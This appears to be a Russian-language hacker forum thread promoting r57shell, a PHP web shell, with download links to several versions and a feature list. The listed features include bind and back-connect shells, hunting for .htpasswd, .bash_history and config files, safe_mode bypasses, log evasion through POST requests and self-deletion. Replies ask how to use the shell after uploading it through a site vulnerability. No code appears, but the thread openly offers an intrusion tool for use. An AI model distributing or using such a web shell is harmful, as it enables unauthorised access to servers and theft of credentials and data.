r57shell! NEW!
 

Версия 1.22 доступна для свободного скачивания.

http://rst.void.ru/download/r57shell.txt

для тех кто не в курсе: r57shell - скрипт на пхп для выполнения шелл-команд на сервере через браузер.
Возможности:
~ защита скрипта с помощью пароля
~ выполнение шелл-команд
~ шелл команды могут выполняться через exec, shell_exec, system, passthru и popen
~ загрузка файлов на сервер с локального компьютера пользователя
~ загрузка файлов с удаленного сервера с помощью wget, fetch, lynx, links, get или curl
~ поддерживает алиасы команд
~ включены алиасы команд:
- поиск на сервере всех файлов с suid битом
- поиск на сервере всех файлов с sgid битом
- поиск на сервере файлов config.inc.php
- поиск на сервере всех директорий и файлов доступных на запись для всех
- поиск на сервере файлов service.pwd
- поиск на сервере файлов .htpasswd
- поиск на сервере файлов .bash_history
- поиск на сервере файлов config*
- поиск на сервере файлов .fetchmailrc
- вывод списка атрибутов файлов на файловой системе ext2fs
- просмотр открытых портов
~ для алиасов поиска доступны как поиск начиная с корня так и поиск только в текущей директории
~ два языка интерфейса: русский, английский
~ возможность забиндить /bin/bash на определенный порт с помощью Perl или С кода
~ возможность делать back-connect с помощью Perl или С кода
~ возможность создать перенаправление портов с помощью утилиты datapipe на С или Perl
~ вывод значений $OSTYPE и sysctl
~ вывод версии php и версии веб-сервера
~ вывод phpinfo()
~ вывод настроек php даже при отключенной функции phpinfo()
~ выполнение любого PHP-кода через функцию eval()
~ получение информации из базы данных mysql (просмотр дампа данных либо сохранение данных в файл)
~ поддержка работы скрипта при включенном SAFE MODE
~ проверки на возможность обхода ограничений при включенном safe_mode
- проверка возможности обхода ограничений open_basedir через функции cURL
- проверка возможности обхода ограничений safe_mode через функцию include
- проверка возможности обхода ограничений safe_mode через загрузку файла в mysql
~ функции редактирования файлов
~ автоматическое определение путей к перлу и качалкам
~ функции удаления временных файлов создаваемых при работе скрипта
~ функция самоудаления скрипта с сервера
~ работает в unix и windows системах
~ почти вся инфа скрипта гоняется через POST запросы что сложнее для обнаружения в логах

Вот некоторые команды мож для новичков таких как я пригодятся.
rm - удалить файл
id - просмотр прав, т.е.uid и gid
chown - смена хозяина файла
rmdir - удалить каталог
mv - переместить файл
ls - просмотр каталога
chmod - смена привилегий файлового доступа
cd - сменить каталог
cp - копирование чего либо
uname -a - всё о версии системы

А чего то сылка не рабочая:
"Forbidden

You don't have permission to access /download/r57shell.txt on this server."


Может кому пригодится _http://slil.ru/24149067 версия r57shell 1.3

Сайт RST закрылся ещё давно, команда распалась.

07.07.2005, 03:30

археологи.. дату хоть смотрите.. =)
красивая дата... :)

мб у кого-то нету..
1.24
http://www.securitylab.ru/software/234092.php
1.31
http://hcr.3dn.ru/expl/php/r57shell.txt

Блин, а как узнать залил ли ты шелл (если дыра в адрестной строке, и там указывается все нужное), и как юзать шел, залил а потом что? куда идти, какой адрес :-\

насколько я знаю, команда не распадалась )

мало знаешь ;)

Кстати в этот день в ЛОндоне террористы взрывали автобусы и поезда в метро =\